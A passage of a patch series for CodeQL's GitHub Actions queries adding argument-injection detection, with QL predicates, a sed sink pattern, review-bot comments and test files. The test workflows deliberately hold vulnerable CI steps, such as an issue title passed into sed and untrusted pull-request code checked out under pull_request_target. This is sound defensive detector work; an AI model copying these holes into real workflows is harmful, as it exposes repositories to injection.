@@ -34,7 +71,7 @@ class AdditionalTaintStep extends Unit { * e.g. path (special name) for `echo "$BODY" >> $GITHUB_PATH` */ bindingset[var_name] -predicate envToRunFlow(string file, string var_name, Run run, string key) { +predicate envToSpecialFile(string file, string var_name, Run run, string key) { exists(string content, string value | ( file = "GITHUB_ENV" and @@ -50,30 +87,7 @@ predicate envToRunFlow(string file, string var_name, Run run, string key) { key = "path" and value = content ) and - ( - // e.g. echo "FOO=$BODY" >> $GITHUB_ENV - // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV - value.matches("$(echo %") and value.indexOf(var_name) > 0 - or - // e.g. - // FOO=$(echo $BODY) - // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string line, string var2_name, string var2_value | - run.getScript().splitAt("\n") = line - | - var2_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and - ( - value.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") - or - value.matches("$(echo %") and value.indexOf(var2_name) > 0 - ) - ) - ) + envToRunExpr(var_name, run, value) ) } @@ -89,7 +103,10 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string var_name | run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and succ.asExpr() = run.getScriptScalar() and - envToRunFlow(["GITHUB_ENV", "GITHUB_PATH"], var_name, run, _) + ( + envToSpecialFile(["GITHUB_ENV", "GITHUB_PATH"], var_name, run, _) or + envToArgInjSink(var_name, run, _) + ) ) } 
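Review bot: envToRunStep now also adds a taint step when the variable only reaches an argument-injection sink (the new `envToArgInjSink(var_name, run, _)` disjunct), but the predicate's doc comment sits above the hunk and is not touched; if it still describes only writes to GITHUB_ENV/GITHUB_PATH it should gain a line such as `* - or the variable is used as the argument of a command matched by argumentInjectionSinks (see envToArgInjSink).` The rename to envToSpecialFile keeps the contract, so the rename itself needs no extra documentation. The start of envToRunStep is outside this hunk.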
@@ -110,7 +127,7 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo exists(Run run, string var_name, string key | run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and succ.asExpr() = run and - envToRunFlow("GITHUB_OUTPUT", var_name, run, key) and + envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) ) } diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll new file mode 100644 index 000000000000..be80cb3295d7 --- /dev/null +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll 
@@ -0,0 +1,73 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.FlowSteps +import codeql.actions.DataFlow + +abstract class ArgumentInjectionSink extends DataFlow::Node { + abstract string getCommand(); +} + +/** + * Holds if a Run step declares an environment variable with contents from a local file. + * e.g. + * run: | + * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV + * echo "sha=$(> $GITHUB_ENV + *class ArgumentInjectionFromFileReadSink extends ArgumentInjectionSink { + * ArgumentInjectionFromFileReadSink() { + * exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | + * this.asExpr() = run.getScriptScalar() and + * step.getAFollowingStep() = run and + * writeToGitHubEnv(run, content) and + * extractVariableAndValue(content, _, value) and + * outputsPartialFileContent(value) + * ) + * } + *} + */ +predicate argumentInjectionSinks(string regexp, int command_group, int argument_group) { + regexp = ".*(sed) (.*)" and command_group = 1 and argument_group = 2 +} + +/** + * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. + * e.g. 
+ * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * sed "s/FOO/$BODY/g" > /tmp/foo + */ +class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { + string command; + + ArgumentInjectionFromEnvVarSink() { + exists(Run run, string var_name | + envToArgInjSink(var_name, run, command) and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() + ) + } + + override string getCommand() { result = command } +} + +class ArgumentInjectionFromMaDSink extends ArgumentInjectionSink { + ArgumentInjectionFromMaDSink() { externallyDefinedSink(this, "argument-injection") } + + override string getCommand() { result = "unknown" } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate a code script. + */ +private module ArgumentInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof ArgumentInjectionSink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ +module ArgumentInjectionFlow = TaintTracking::Global; diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index cbdf9a917ce9..e81c6954d72f 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -36,7 +36,7 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { exists(Run run, string var_name | - envToRunFlow("GITHUB_PATH", var_name, run, _) and + envToSpecialFile("GITHUB_PATH", var_name, run, _) and exists(run.getInScopeEnvVarExpr(var_name)) and run.getScriptScalar() = this.asExpr() ) 
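Review bot: The sink regexp `".*(sed) (.*)"` in argumentInjectionSinks has no word boundary before `sed`, so a line such as `echo "parsed $BODY"` is captured as a sed invocation with everything after the substring as its argument; `regexp = ".*\\b(sed)\\s+(.*)"` limits it to the command token and also accepts tab separation. The same pattern reappears unchanged as the first data row of ql/lib/ext/config/argument_injection_sinks.yml in patch 395, so both places need the fix. The doc comment above argumentInjectionSinks is a commented-out file-read sink class from another query and does not describe the predicate; a short doc such as `/** Holds if regexp matches a command vulnerable to argument injection; command_group and argument_group are the capture groups of the command and of its argument. */` would replace it. The docs on ArgumentInjectionConfig and ArgumentInjectionFlow still say "construct and evaluate a code script", which is the code-injection wording; `/** Tracks flow of unsafe user input into the argument of a command vulnerable to argument injection. */` fits this module.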
diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 5a3dbebc5123..869134215634 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -38,7 +38,7 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, string var_name | - envToRunFlow("GITHUB_ENV", var_name, run, _) and + envToSpecialFile("GITHUB_ENV", var_name, run, _) and exists(run.getInScopeEnvVarExpr(var_name)) and run.getScriptScalar() = this.asExpr() ) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index f9274f54872d..07fc7c7af73d 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -46,7 +46,6 @@ extensions: - ["rails\\s+db:create"] - ["rails\\s+assets:precompile"] - ["rubocop"] - - ["sed\\s+-e"] - ["sed\\s+-f"] - ["stylelint"] - ["terraform"] diff --git a/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql new file mode 100644 index 000000000000..e56f613fac4f --- /dev/null +++ b/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql 
@@ -0,0 +1,26 @@ +/** + * @name Argument injection + * @description Passing unsanitized user input to a command that will run it as a subprocess. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision very-high + * @id actions/argument-injection/critical + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.ArgumentInjectionQuery +import ArgumentInjectionFlow::PathGraph + +from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink +where + ArgumentInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr()) +select sink.getNode(), source, sink, + "Potential argument injection in $@ command, which may be controlled by an external user.", sink, + sink.getNode().(ArgumentInjectionSink).getCommand() diff --git a/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql b/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql new file mode 100644 index 000000000000..66c51ae36738 --- /dev/null +++ b/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql 
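Review bot: The `@description` of the new query, "Passing unsanitized user input to a command that will run it as a subprocess.", is the command-injection wording and does not describe what ArgumentInjectionSink models; `@description Passing unsanitized user input as an argument to a command that interprets its arguments, allowing the command's behavior to be altered.` is accurate. The `@tags` list CWE-094/095/116 while argument injection is CWE-088, so `external/cwe/cwe-088` belongs in the list. `@security-severity 9` here versus `5.0` in ArgumentInjectionMedium.ql is inconsistent formatting; `9.0` keeps the two in step. ArgumentInjectionMedium.ql in the next hunk has the same description and tag issue.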
@@ -0,0 +1,26 @@ +/** + * @name Argument injection + * @description Passing unsanitized user input to a command that will run it as a subprocess. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision medium + * @id actions/argument-injection/medium + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.ArgumentInjectionQuery +import ArgumentInjectionFlow::PathGraph + +from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink +where + ArgumentInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) +select sink.getNode(), source, sink, + "Potential argument injection in $@ command, which may be controlled by an external user.", sink, + sink.getNode().(ArgumentInjectionSink).getCommand() diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index f37c374658ae..9319718b7fc0 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -17,7 +17,6 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph -import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.ql b/ql/src/Security/CWE-094/CodeInjectionMedium.ql index 43f4eb9c38a2..0f8b6e13a290 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.ql +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.ql @@ -17,7 +17,6 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph -import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where 
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml new file mode 100644 index 000000000000..b5478a5e1366 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml @@ -0,0 +1,20 @@ +name: Argument injection + +on: + issues: + types: [opened, edited] + +jobs: + test1: + runs-on: ubuntu-latest + env: + TITLE: ${{github.event.issue.title}} + steps: + - run: | + echo "s/FOO/$TITLE/g" + - run: | + sed "s/FOO/$TITLE/g" + + + + diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected new file mode 100644 index 000000000000..5b82e52682e0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected @@ -0,0 +1,8 @@ +edges +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | provenance | | +nodes +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | semmle.label | sed "s/FOO/$TITLE/g"\n | +subpaths +#select +| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | sed | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref new file mode 100644 index 000000000000..6b3e2fd9f629 --- /dev/null 
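Review bot: The new test workflow covers one positive (`sed "s/FOO/$TITLE/g"`) and one negative (`echo "s/FOO/$TITLE/g"`) case, but nothing pins the matcher's edges: a line where `sed ` occurs only inside another word (for example `echo "parsed $TITLE"`), a single-quoted use (`sed 's/FOO/$TITLE/g'`, which the shell does not expand), and an invocation with options before the script (`sed -i "s/FOO/$TITLE/g"`). Adding those steps, with the expected-file rows they produce, would document which of these the query intends to report. The trailing blank lines at the end of the file can be dropped.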
+++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-094/ArgumentInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected new file mode 100644 index 000000000000..37fd97270d7f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected @@ -0,0 +1,7 @@ +edges +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | provenance | | +nodes +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | semmle.label | sed "s/FOO/$TITLE/g"\n | +subpaths +#select diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref new file mode 100644 index 000000000000..b9c4ae95e43a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-094/ArgumentInjectionMedium.ql From 732f0dc29fb2fe9ab81941a0e228bbfad98f2b40 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 10:03:25 +0200 Subject: [PATCH 395/707] feat(queries): Argument Injection Make argument injection sinks congigurable with MaD --- ql/lib/codeql/actions/config/Config.qll | 15 +++++++++-- .../actions/config/ConfigExtensions.qll | 6 +++++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 3 +-- .../security/ArgumentInjectionQuery.qll | 25 +++---------------- .../ext/config/argument_injection_sinks.yml | 8 ++++++ .../.github/workflows/artifactpoisoning7.yml | 1 + .../.github/workflows/artifactpoisoning8.yml | 18 +++++++++++++ .../CWE-829/.github/workflows/test9.yml | 18 +++++++++++++ .../ArtifactPoisoningCritical.expected | 4 +++ .../CWE-829/ArtifactPoisoningMedium.expected | 3 +++ .../CWE-829/UnpinnedActionsTag.expected | 3 ++- .../UntrustedCheckoutCritical.expected | 9 ++++--- 12 files changed, 83 insertions(+), 30 deletions(-) create mode 100644 ql/lib/ext/config/argument_injection_sinks.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning8.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index dd63fda93d1d..1cc8ce4eb8a1 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -46,7 +46,7 @@ predicate externallyTriggerableEventsDataModel(string event) { } /** - * MaD models for poisonable commands + * MaD models for poisonable commands * Fields: * - regexp: Regular expression for matching poisonable commands */ @@ -74,7 +74,7 @@ predicate poisonableActionsDataModel(string action) { } /** - * MaD models for for event properties that can be user-controlled. + * MaD models for event properties that can be user-controlled. * Fields: * - property: event property * - kind: property kind 
@@ -82,3 +82,14 @@ predicate poisonableActionsDataModel(string action) { predicate untrustedEventPropertiesDataModel(string property, string kind) { Extensions::untrustedEventPropertiesDataModel(property, kind) } + +/** + * MaD models for arguments to commands that execute the given argument. + * Fields: + * - regexp: Regular expression for matching argument injections. + * - command_group: capture group for the command. + * - argument_group: capture group for the argument. + */ +predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { + Extensions::argumentInjectionSinksDataModel(regexp, command_group, argument_group) +} diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index 26e77ce7235f..4a492edeadfb 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -44,3 +44,9 @@ extensible predicate poisonableActionsDataModel(string action); */ extensible predicate untrustedEventPropertiesDataModel(string property, string kind); +/** + * Holds for arguments to commands that execute the given argument + */ +extensible predicate argumentInjectionSinksDataModel( + string regexp, int command_group, int argument_group +); diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index ca0b7a70159d..a40e11bda956 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -8,7 +8,6 @@ private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery -private import codeql.actions.security.ArgumentInjectionQuery /** * A unit class for adding additional taint steps. 
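Review bot: The new extensible predicate in ConfigExtensions.qll is documented only as "Holds for arguments to commands that execute the given argument", which does not explain the three columns an extension row must provide; mirroring the field list the wrapper in Config.qll already has (regexp, command_group, argument_group with their meaning) keeps the extension point self-describing for anyone writing a data-extension file. The phrase "arguments to commands that execute the given argument" in both places is hard to parse; `MaD models for commands whose argument is interpreted as a script or expression (argument injection sinks).` reads more directly.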
@@ -52,7 +51,7 @@ bindingset[var_name] predicate envToArgInjSink(string var_name, Run run, string command) { exists(string argument, string line, string regexp, int command_group, int argument_group | run.getScript().splitAt("\n") = line and - argumentInjectionSinks(regexp, command_group, argument_group) and + argumentInjectionSinksDataModel(regexp, command_group, argument_group) and argument = line.regexpCapture(regexp, argument_group) and command = line.regexpCapture(regexp, command_group) and envToRunExpr(var_name, run, argument) and diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index be80cb3295d7..bf29a1c8458f 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -9,28 +9,6 @@ abstract class ArgumentInjectionSink extends DataFlow::Node { abstract string getCommand(); } -/** - * Holds if a Run step declares an environment variable with contents from a local file. - * e.g. - * run: | - * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV - * echo "sha=$(> $GITHUB_ENV - *class ArgumentInjectionFromFileReadSink extends ArgumentInjectionSink { - * ArgumentInjectionFromFileReadSink() { - * exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | - * this.asExpr() = run.getScriptScalar() and - * step.getAFollowingStep() = run and - * writeToGitHubEnv(run, content) and - * extractVariableAndValue(content, _, value) and - * outputsPartialFileContent(value) - * ) - * } - *} - */ -predicate argumentInjectionSinks(string regexp, int command_group, int argument_group) { - regexp = ".*(sed) (.*)" and command_group = 1 and argument_group = 2 -} - /** * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. * e.g. 
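Review bot: With the ArgumentInjectionQuery import dropped in the previous hunk, envToArgInjSink now depends on argumentInjectionSinksDataModel being visible through one of the imports above line 8 of FlowSteps.qll; that import list is only partly visible here, so it is worth confirming that codeql.actions.config.Config (or the umbrella `actions` import) is in scope, since the predicate was previously reachable only via the removed import. The rest of envToArgInjSink lies outside this hunk.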
@@ -53,6 +31,9 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { override string getCommand() { result = command } } +/** + * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. + */ class ArgumentInjectionFromMaDSink extends ArgumentInjectionSink { ArgumentInjectionFromMaDSink() { externallyDefinedSink(this, "argument-injection") } diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml new file mode 100644 index 000000000000..8a9350cfebbc --- /dev/null +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: argumentInjectionSinksDataModel + # https://gtfobins.github.io/ + data: + - [".*(sed) (.*)", 1, 2] + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml index e815c3dd1292..63acdc612b0e 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml @@ -4,6 +4,7 @@ on: workflow_run jobs: my-second-job: + runs-on: ubuntu-latest steps: - name: download pr artifact uses: dawidd6/action-download-artifact@v2 diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning8.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning8.yml new file mode 100644 index 000000000000..8cb380ae0436 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning8.yml 
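Review bot: The doc comment added to ArgumentInjectionFromMaDSink is a copy of the ArgumentInjectionFromEnvVarSink one ("declares an environment variable, uses it as the argument ...") and does not describe this class, whose only condition is `externallyDefinedSink(this, "argument-injection")`; `/** An argument injection sink declared through a Models-as-Data sink row of kind "argument-injection". */` states the actual contract. Its getCommand() (outside this hunk, introduced in the earlier patch) returns the literal "unknown", which the query message renders as "in unknown command"; either let the MaD row carry the command name or document that the placeholder is expected. The argument_injection_sinks.yml hunk below carries the unanchored `.*(sed) (.*)` pattern already discussed on the first ArgumentInjectionQuery.qll hunk.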
@@ -0,0 +1,18 @@ +# Second Workflow +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - name: Use artifact + run: | + sed -f config foo.md > bar.md diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml new file mode 100644 index 000000000000..6f7ff665be3b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml @@ -0,0 +1,18 @@ +name: OpenAPI +on: + pull_request_target: + +permissions: {} + +jobs: + base: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + fetch-depth: 0 + - run: + sed -f script/config foo.md > bar.md + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index c6733eb66b8a..6b9b0f670f3d 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected 
@@ -1,4 +1,5 @@ edges +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | @@ -13,6 +14,8 @@ edges | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | 
@@ -41,6 +44,7 @@ nodes | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | subpaths #select +| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index a18aa5bdc80e..18ad272f8031 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,4 +1,5 @@ edges +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | 